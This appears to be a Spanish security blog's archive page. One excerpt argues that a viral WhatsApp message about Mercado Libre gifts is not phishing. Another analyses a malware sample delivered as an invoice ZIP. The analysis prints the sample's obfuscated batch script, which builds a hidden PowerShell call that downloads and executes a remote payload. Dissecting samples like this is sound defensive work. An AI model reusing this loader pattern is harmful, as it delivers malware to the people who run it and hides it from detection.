Entradas

Mostrando las entradas de marzo, 2020

Analizando Mercado Libre 20th Anniversary Gifts

-
Imagen
 Análisis de mensaje Mercado Libre 20th Anniversary Gifts. En estos días se ha estado compartiendo  un mensaje a través de la aplicación de mensajería Whatsapp, donde supuesta mente Mercado Libre regalara Gifts por su aniversario número 20 y el cual lo catalogan como Phishing. Sin embargo en mi opinión, este no es un ataque de phishing ya que la definición de este es: " El phishing es un tipo de ataque de ingeniería social que se utiliza a menudo para robar datos del usuario, incluidas las credenciales de inicio de sesión y los números de tarjetas de crédito . Ocurre cuando un atacante, disfrazado de entidad confiable, engaña a una víctima para que abra un correo electrónico, mensaje instantáneo o mensaje de texto" De acuerdo a lo anterior y en resumen, el phishing es utilizado para robar credenciales o información personal de la victima, en este caso del famoso mensaje no recolecta ningún tipo de información, unicamente solicita sea compartido con más personas para "re
Publicar un comentario
Leer más

Malware analisis Factura

-
Desmenuzando y entendiendo el codigo Factura.zip Hola Amigos, dando continuidad al post anterior sobre analizando malware comprobante fiscal , acabo de encontrar una nueva variante de este con modificación en su código. Bien comenzamos con el primer código, es un script por lotes ejecutable (batch), este archivo con nombre " Verificacfdi.facturaelectronica.emision.cmd ", su contenido es el siguiente. @echo off cd %SystemRoot%\System32 set a=Win set b=dow set c=sPo set d=wer set e=She set f=ll\ set g=v1. set h=0\po set i=we set j=rsh set k=ell set l=.ex set m=e -n set n=op set o=-w set p=in 1 - echo ieX("Ie`X`(N`ew-oBJ`e`Ct N`et.`Web`ClIeNt`).DOwnlOa`d`StRIN`G('http://t...../mx/a9Y0P6X9y9f1d5uayNa/kk/a9Y0P6X9y9f1d5uayNa')"); | %a%%b%%c%%d%%e%%f%%g%%h%%i%%j%%k%%l%%m%%n%%o%%p% Como pueden observar es un archivo batch que establece variables para al final concatenar y descargar otro archivo.El código anterior queda de la siguiente manera. @echo off
Publicar un comentario
Leer más